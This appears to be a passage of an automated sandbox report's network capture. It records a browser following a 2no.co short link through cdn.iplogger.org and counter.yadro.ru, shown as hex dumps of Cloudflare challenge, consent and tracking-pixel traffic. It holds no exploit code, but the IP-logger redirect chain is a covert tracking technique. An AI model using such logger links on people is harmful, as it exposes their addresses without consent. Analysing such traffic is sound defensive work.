                                                                                                Data Ascii: @media only screen and (max-height: 600px),}@media only screen and (max-width:600px) {p, ul li, ol li, a { line-height:150%!important }h1, h2, h3, h1 a, h2 a, h3 a { line-height:120% }h1 { font-size:42px!important; text-align:center }h2 { font
                                                                                                2024-07-29 22:46:20 UTC1369INData Raw: 61 73 73 3d 22 73 75 62 6d 69 74 22 3e 0a 09 09 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 3e 0a 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6b 65 79 22 20 76 61 6c 75 65 3d 22 75 6e 69 6b 65 79 5f 34 39 64 30 62 30 65 65 38 33 33 33 61 32 64 38 62 35 31 38 64 65 34 61 63 32 39 62 39 37 62 66 37 63 32 62 35 61 30 33 39 61 63 37 65 66 37 35 34 65 31 37 62 31 38 62 64 62 38 36 36 62 39 66 22 3e 0a 09 09 09 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 6f 6b 22 20 6e 61 6d 65 3d 22 63 6f 6e 73 65 6e 74 22 20 76 61 6c 75 65 3d 22 31 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 41 67 72 65 65 20 26 20 43 6f 6e 74 69 6e 75 65 3c 2f 62 75 74 74 6f 6e 3e 0a 0a 09 09 09 3c
                                                                                                Data Ascii: ass="submit"><form action="" method="POST"><input type="hidden" name="key" value="unikey_49d0b0ee8333a2d8b518de4ac29b97bf7c2b5a039ac7ef754e17b18bdb866b9f"><button class="ok" name="consent" value="1" type="submit">Agree & Continue</button><
                                                                                                2024-07-29 22:46:20 UTC57INData Raw: 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: ';'),d.body.appendChild(a);</script></body></html>
                                                                                                2024-07-29 22:46:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.749719172.67.132.1134437740C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-07-29 22:46:20 UTC588OUTGET /redirect/handshake.png HTTP/1.1
                                                                                                Host: cdn.iplogger.org
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Referer: https://2no.co/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2024-07-29 22:46:20 UTC1285INHTTP/1.1 403 Forbidden
                                                                                                Date: Mon, 29 Jul 2024 22:46:20 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                Cross-Origin-Resource-Policy: same-origin
                                                                                                Origin-Agent-Cluster: ?1
                                                                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                Referrer-Policy: same-origin
                                                                                                X-Content-Options: nosniff
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                cf-mitigated: challenge
                                                                                                2024-07-29 22:46:20 UTC691INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 4b 37 42 37 31 43 63 6b 79 6a 4a 33 63 4d 56 4a 71 61 64 34 46 53 52 50 77 62 4b 64 4b 63 2f 68 4f 77 73 4c 6e 35 59 79 43 7a 4b 42 76 50 75 61 69 6c 68 37 50 63 47 75 42 4d 4e 38 5a 77 66 56 51 41 47 73 70 41 47 70 69 4c 44 64 63 4a 44 61 4e 68 72 4d 72 33 71 50 61 49 2b 53 36 71 37 6a 6e 35 50 43 2b 50 74 45 5a 44 45 3d 24 2f 58 4d 2b 70 6d 63 52 62 6a 6d 38 43 6b 44 76 59 68 64 70 72 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                                                                Data Ascii: cf-chl-out: K7B71CckyjJ3cMVJqad4FSRPwbKdKc/hOwsLn5YyCzKBvPuailh7PcGuBMN8ZwfVQAGspAGpiLDdcJDaNhrMr3qPaI+S6q7jn5PC+PtEZDE=$/XM+pmcRbjm8CkDvYhdprw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                                                                2024-07-29 22:46:20 UTC1369INData Raw: 33 65 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                                                Data Ascii: 3efc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                                                                                2024-07-29 22:46:20 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                                                                                Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                                                                                2024-07-29 22:46:20 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                                                                                2024-07-29 22:46:20 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                                                                                Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                                                                                2024-07-29 22:46:20 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                                                                                Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                                                                                2024-07-29 22:46:20 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                                                                                Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                                                                                2024-07-29 22:46:20 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                                                                                Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                                                                                2024-07-29 22:46:20 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 33 36 34 33 27 2c 63 52 61 79 3a 20 27 38 61 62 30 61 34 66 63 61 64 36 34 37 32 37 31 27 2c 63 48 61 73 68 3a 20 27 66 33 36 35 30 37 37 34 66 35 36 64 36 39 33 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 72 65 64 69 72 65 63 74 5c 2f 68 61 6e 64 73 68 61 6b 65 2e 70 6e 67 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 4c 5f 33 46 56 6c 4a 36 33 46 57 71 53 6d 45 4f 51 34 4d 4d 6a 6f 49 39 54 4b 59 31 49 32 47 77 6b 74 48 35 7a 54 7a 37 66 70 6f 2d 31 37 32 32 32 39 33 31 38 30 2d 30 2e 30 2e 31 2e 31
                                                                                                Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "cdn.iplogger.org",cType: 'managed',cNounce: '3643',cRay: '8ab0a4fcad647271',cHash: 'f3650774f56d693',cUPMDTk: "\/redirect\/handshake.png?__cf_chl_tk=L_3FVlJ63FWqSmEOQ4MMjoI9TKY1I2GwktH5zTz7fpo-1722293180-0.0.1.1
                                                                                                2024-07-29 22:46:20 UTC1369INData Raw: 47 71 52 73 78 79 65 69 57 51 56 5f 57 39 45 5f 62 39 74 37 79 70 4e 2e 32 58 70 4f 51 50 44 4d 32 58 41 43 79 71 50 6b 6c 66 4f 68 4b 39 2e 49 52 4f 59 50 5a 72 39 66 4d 48 65 70 6a 6c 67 39 78 65 49 66 50 51 49 5a 31 43 49 65 59 44 69 4f 79 75 4b 67 5f 38 56 45 6c 35 30 74 55 61 52 73 56 74 32 55 62 43 52 64 5a 50 41 4d 2e 48 38 42 43 4e 38 48 6a 74 45 66 5f 61 37 44 32 7a 46 4a 71 4f 50 6d 4d 74 6c 74 6c 47 4a 4c 2e 70 36 39 46 44 46 53 54 58 48 47 67 75 66 64 4f 39 4f 32 65 65 61 6e 4d 69 63 57 4f 38 67 48 49 68 66 63 71 70 44 6d 6d 48 38 62 41 41 48 74 56 6d 4b 48 47 77 78 70 30 72 58 61 50 73 53 64 70 69 37 64 37 4a 76 59 6b 30 50 73 4c 38 4f 54 2e 50 73 79 33 67 69 64 62 4e 57 70 76 45 49 70 59 79 31 43 48 71 6e 67 65 6b 6f 68 42 62 79 41 36 51 79
                                                                                                Data Ascii: GqRsxyeiWQV_W9E_b9t7ypN.2XpOQPDM2XACyqPklfOhK9.IROYPZr9fMHepjlg9xeIfPQIZ1CIeYDiOyuKg_8VEl50tUaRsVt2UbCRdZPAM.H8BCN8HjtEf_a7D2zFJqOPmMtltlGJL.p69FDFSTXHGgufdO9O2eeanMicWO8gHIhfcqpDmmH8bAAHtVmKHGwxp0rXaPsSdpi7d7JvYk0PsL8OT.Psy3gidbNWpvEIpYy1CHqngekohBbyA6Qy


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.74971888.212.201.1984437740C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-07-29 22:46:21 UTC664OUTGET /hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.903191178197396 HTTP/1.1
                                                                                                Host: counter.yadro.ru
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Referer: https://2no.co/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2024-07-29 22:46:21 UTC601INHTTP/1.1 302 Moved Temporarily
                                                                                                Server: nginx/1.17.9
                                                                                                Date: Mon, 29 Jul 2024 22:46:21 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 32
                                                                                                Connection: close
                                                                                                Location: https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.903191178197396
                                                                                                Expires: Sun, 30 Jul 2023 21:00:00 GMT
                                                                                                Pragma: no-cache
                                                                                                Cache-control: no-cache
                                                                                                P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                                                Set-Cookie: FTID=1cg1kz1ZJrer1cg1kz0018T6; path=/; expires=Tue, 29 Jul 2025 21:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                                                Strict-Transport-Security: max-age=86400
                                                                                                2024-07-29 22:46:21 UTC32INData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 4d 6f 76 65 64 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                Data Ascii: <html><body>Moved</body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.74972435.190.80.14437740C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-07-29 22:46:21 UTC535OUTOPTIONS /report/v4?s=u4EPwlIfu5u%2FXXj0kRaPdkPJwH6VqTzmIykH2X9%2Fyuj1FCpzRnd4kOm6Jqn1GDDAN13dvkMlZJ9E0adkpSW7TqU2KldHQHU11YPPbJtFEHxZlyRQ0Vh6q2i%2Fu8W3Miwh0Hqm HTTP/1.1
                                                                                                Host: a.nel.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                Origin: https://cdn.iplogger.org
                                                                                                Access-Control-Request-Method: POST
                                                                                                Access-Control-Request-Headers: content-type
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2024-07-29 22:46:21 UTC336INHTTP/1.1 200 OK
                                                                                                Content-Length: 0
                                                                                                access-control-max-age: 86400
                                                                                                access-control-allow-methods: POST, OPTIONS
                                                                                                access-control-allow-origin: *
                                                                                                access-control-allow-headers: content-type, content-length
                                                                                                date: Mon, 29 Jul 2024 22:46:21 GMT
                                                                                                Via: 1.1 google
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.74972588.212.201.1984437740C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-07-29 22:46:22 UTC705OUTGET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.903191178197396 HTTP/1.1
                                                                                                Host: counter.yadro.ru
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Referer: https://2no.co/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Cookie: FTID=1cg1kz1ZJrer1cg1kz0018T6
                                                                                                2024-07-29 22:46:22 UTC481INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.17.9
                                                                                                Date: Mon, 29 Jul 2024 22:46:22 GMT
                                                                                                Content-Type: image/gif
                                                                                                Content-Length: 445
                                                                                                Connection: close
                                                                                                Expires: Sun, 30 Jul 2023 21:00:00 GMT
                                                                                                Pragma: no-cache
                                                                                                Cache-control: no-cache
                                                                                                P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                                                Set-Cookie: VID=2DNPIG0nbdur1cg1k-0018Z0; path=/; expires=Tue, 29 Jul 2025 21:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Strict-Transport-Security: max-age=86400
                                                                                                2024-07-29 22:46:22 UTC445INData Raw: 47 49 46 38 37 61 1f 00 1f 00 d5 00 00 02 02 02 82 56 06 da be 86 42 2e 0a c2 82 02 22 1a 06 a2 6a 06 32 26 08 62 42 06 de ae 42 fa de a1 b2 76 02 5a 4e 3e ea a2 16 2a 26 1a ee d6 aa 52 36 06 2a 22 0a da a2 2a 3a 26 08 94 62 06 da 92 02 a6 72 12 26 22 0b ac 72 02 4a 2e 0a ca 86 02 72 4a 06 fe de 9e ba 7a 02 f2 de ae 24 1e 0e 36 26 08 fe de 9a fe ba 32 fe c6 52 fe aa 02 5e 3e 08 8e 5e 06 9e 6a 06 7e 52 06 f2 da b2 4e 36 0a 6a 46 06 f7 de a6 26 1e 0a a5 6e 02 f2 da ae 56 3a 0a 3e 2a 08 de 96 06 4e 32 06 86 5a 06 46 2e 06 c6 86 02 b6 7a 02 2e 22 08 96 66 06 ae 76 02 ce 8a 02 76 4e 06 bc 7e 02 f6 de aa c6 82 02 2c 00 00 00 00 1f 00 1f 00 00 06 e2 c0 10 67 a8 28 16 59 48 96 6f e9 f3 bc 9e d0 94 54 fa 48 84 46 a4 ac 76 cb ed 76 1b 94 ab 77 4c d6 6a c2 d8 b2 9a
                                                                                                Data Ascii: GIF87aVB."j2&bBBvZN>*&R6*"*:&br&"rJ.rJz$6&2R^>^j~RN6jF&nV:>*N2ZF.z."fvvN~,g(YHoTHFvvwLj


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.74972735.190.80.14437740C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-07-29 22:46:22 UTC476OUTPOST /report/v4?s=u4EPwlIfu5u%2FXXj0kRaPdkPJwH6VqTzmIykH2X9%2Fyuj1FCpzRnd4kOm6Jqn1GDDAN13dvkMlZJ9E0adkpSW7TqU2KldHQHU11YPPbJtFEHxZlyRQ0Vh6q2i%2Fu8W3Miwh0Hqm HTTP/1.1
                                                                                                Host: a.nel.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                Content-Length: 424
                                                                                                Content-Type: application/reports+json
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept-Encoding: gzip, deflate, br
